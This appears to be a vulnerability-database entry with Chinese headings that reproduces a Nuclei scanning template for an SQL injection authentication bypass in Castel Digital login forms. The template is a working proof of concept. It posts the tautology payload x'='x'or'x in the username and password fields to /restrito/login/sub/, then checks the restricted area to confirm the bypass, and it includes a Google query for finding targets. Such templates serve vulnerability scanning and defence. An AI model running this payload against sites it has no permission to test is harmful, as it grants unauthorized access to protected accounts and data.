漏洞描述
SQL Injection vulnerability in Castel Digital login forms.
castel-digital-sqli: Castel Digital - Authentication Bypass
PoC代码[已公开]
id: castel-digital-sqli
info:
name: Castel Digital - Authentication Bypass
author: s4e-io
severity: high
description: |
SQL Injection vulnerability in Castel Digital login forms.
reference:
- https://www.casteldigital.com.br/
- https://cxsecurity.com/issue/WLB-2024050032
metadata:
verified: true
max-request: 2
google-query: "Castel Digital"
tags: sqli,auth-bypass,castel,vuln
http:
- raw:
- |
POST /restrito/login/sub/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
- |
GET /restrito/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "Banner"
- "Construtoras"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100fa85f86545a05e57bb65a57fc4d43ac753f4f55473ef9617b61f61513a89985602204bf1dc1a025d1871062b02a0904bbb0db0f4ddfb7b792e1cd5b35921d2c7a28f:922c64590222798bb761d5b6d8e72950